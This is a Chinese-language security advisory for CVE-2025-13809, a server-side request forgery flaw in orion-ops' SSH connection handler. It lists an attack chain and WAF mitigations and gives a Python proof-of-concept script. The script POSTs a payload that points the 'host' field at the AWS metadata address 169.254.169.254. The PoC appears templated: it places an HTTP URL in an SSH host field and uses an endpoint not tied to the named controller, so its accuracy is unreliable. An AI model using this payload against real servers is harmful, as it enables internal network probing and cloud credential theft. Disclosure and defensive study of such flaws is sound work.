CVE-2025-13809 CVSS 6.3 中危

CVE-2025-13809 orion-ops SSH连接处理器SSRF漏洞

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13809

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

orionsec orion-ops

漏洞概述

CVE-2025-13809是orionsec orion-ops项目中存在的服务器端请求伪造（SSRF）漏洞。该漏洞位于SSH连接处理器组件中，攻击者可以通过操纵host、sshPort、username、password、authType等参数，诱导服务器向恶意地址发起请求。由于该漏洞影响SSH连接功能，攻击者可能利用此漏洞探测内网服务、访问内部资源或进行端口扫描。漏洞评分6.3（CVSS:3.1），属于中危级别。攻击者需要低权限账户即可发起攻击，无需用户交互即可实现远程利用。该漏洞已在GitHub上公开披露利用代码，建议受影响用户尽快采取防护措施。

技术细节

该漏洞存在于orion-ops-api项目的MachineInfoController.java文件中，属于SSH连接处理功能。攻击者通过构造特殊的host参数（如内网IP地址、localhost或云元数据地址），使服务器在处理SSH连接请求时向攻击者指定的目标发起请求。漏洞的根本原因在于应用程序缺乏对用户输入的host参数进行充分的验证和限制，未能阻止对内部网络资源的访问。攻击者可以利用此漏洞进行内网探测、访问云服务商元数据服务（如AWS 169.254.169.254）、扫描内部服务等操作。结合SSH连接功能，攻击者还可能尝试获取凭证或进行进一步的内网渗透。

攻击链分析

STEP 1

步骤1

攻击者获取orion-ops系统低权限账户

STEP 2

步骤2

访问SSH连接管理功能（MachineInfoController）

STEP 3

步骤3

构造恶意host参数为目标内网地址或云元数据服务

STEP 4

步骤4

发送包含SSRF payload的SSH连接请求

STEP 5

步骤5

服务器向攻击者指定的目标地址发起请求

STEP 6

步骤6

攻击者获取响应数据，实现内网探测或敏感信息获取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-13809 SSRF PoC for orion-ops
# Target: orionsec orion-ops

TARGET_URL = "http://target.com/api/machine/ssh/connect"

# SSRF payload - target internal metadata service
PAYLOAD = {
    "host": "http://169.254.169.254/latest/meta-data/",
    "sshPort": 22,
    "username": "attacker",
    "password": "test",
    "authType": "password"
}

def exploit_ssrf():
    """
    Exploit SSRF vulnerability in SSH Connection Handler
    This PoC demonstrates how an attacker can make the server
    request arbitrary URLs via the host parameter
    """
    try:
        response = requests.post(
            TARGET_URL,
            json=PAYLOAD,
            verify=False,
            timeout=30
        )
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":
    exploit_ssrf()

影响范围

orionsec orion-ops < 5925824997a3109651bbde07460958a7be249ed1

防御指南

临时缓解措施

在修复补丁发布前，可通过配置Web应用防火墙（WAF）规则限制包含内网IP段（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）和云元数据地址（169.254.169.254）的请求。同时限制低权限用户对SSH连接功能的访问，并对相关API端点实施额外的认证和授权检查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表